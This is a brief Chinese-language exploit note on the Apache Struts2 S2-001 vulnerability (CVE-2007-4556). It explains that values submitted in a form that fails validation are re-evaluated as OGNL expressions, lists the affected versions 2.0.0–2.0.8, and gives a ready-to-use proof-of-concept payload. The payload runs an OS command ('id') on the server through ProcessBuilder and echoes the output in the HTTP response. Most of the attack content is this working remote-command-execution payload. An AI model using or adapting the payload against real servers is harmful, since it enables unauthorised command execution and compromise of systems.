(CVE-2007-4556)s2-001.md
772 B / 2021-07-15 19:48:23
(CVE-2007-4556)s2-001
=======================
一、漏洞简介
------------
因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用
OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中
二、漏洞影响
------------
2.0.0-2.0.8
三、复现过程
------------
### poc
图片.png
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"id"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}